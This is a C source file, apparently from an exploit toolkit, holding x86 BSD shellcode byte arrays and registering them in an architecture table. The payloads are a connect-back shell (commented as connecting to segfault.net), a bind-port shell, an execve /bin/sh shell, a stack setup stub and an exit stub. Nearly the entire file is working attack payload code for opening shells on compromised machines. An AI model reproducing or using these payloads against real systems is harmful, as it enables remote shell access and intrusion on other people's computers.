1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
|
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "shellcode.h"
#include "x86.h"
/* ATTENTION: this must be first of concated shellcodes and the last
one must be terminated with x86_TERMINATOR */
shellcode x86_bsd_spset = {
"x86-bsd-spset",
20,
"\xb8\x78\x56\x34\x12\x99\xb6\x02\x5b\x53\x44\x4a"
"\x74\x06\x39\xc3\x74\xf3\xeb\xf4"
};
/* ATTENTION: connects to segfault.net at the moment */
shellcode x86_bsd_connectsh = {
"x86-bsd-connectsh",
66,
"\x31\xed\xf7\xe5\x55\x45\x55\x45\x55\xb0\x61\x55"
"\xcd\x80\x96\x68\xc3\x58\xb0\xca\x66\x68\x44\x44"
"\x66\x55\x89\xe7\x6a\x10\x57\x56\x56\x6a\x62\x58"
"\xcd\x80\x60\xb0\x5a\xcd\x80\x4d\x79\xf8\x52\x89"
"\xe3\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x60"
"\x5e\x5e\xb0\x3b\xcd\x80"
};
shellcode x86_bsd_portshellsh = {
"x86-bsd-portshellsh",
73,
"\x31\xdb\xf7\xe3\x53\x43\x53\x43\x53\xb0\x61\x53"
"\xcd\x80\x96\x52\x66\x68\x44\x44\x66\x53\x89\xe5"
"\x6a\x10\x55\x56\x56\x6a\x68\x58\xcd\x80\xb0\x6a"
"\xcd\x80\x60\xb0\x1e\xcd\x80\x53\x50\x50\xb0\x5a"
"\xcd\x80\x4b\x79\xf6\x52\x89\xe3\x68\x6e\x2f\x73"
"\x68\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xb0\x3b\xcd"
"\x80"
};
shellcode x86_bsd_execvesh = {
"x86-bsd-execvesh",
22,
"\x6a\x3b\x58\x99\x52\x89\xe3\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xcd\x80"
};
shellcode x86_bsd_exit = {
"x86-bsd-exit",
5,
"\x31\xc0\x40\xcd\x80"
};
shellcode * x86_bsd_shellcodes[] = {
&x86_bsd_execvesh, /* TODO: add other shellcodes here */
&x86_bsd_exit,
&x86_bsd_portshellsh,
&x86_bsd_connectsh,
&x86_bsd_spset,
NULL,
};
arch x86_bsd = {
"x86-bsd",
1,
x86_nop,
x86_bsd_shellcodes,
};
|
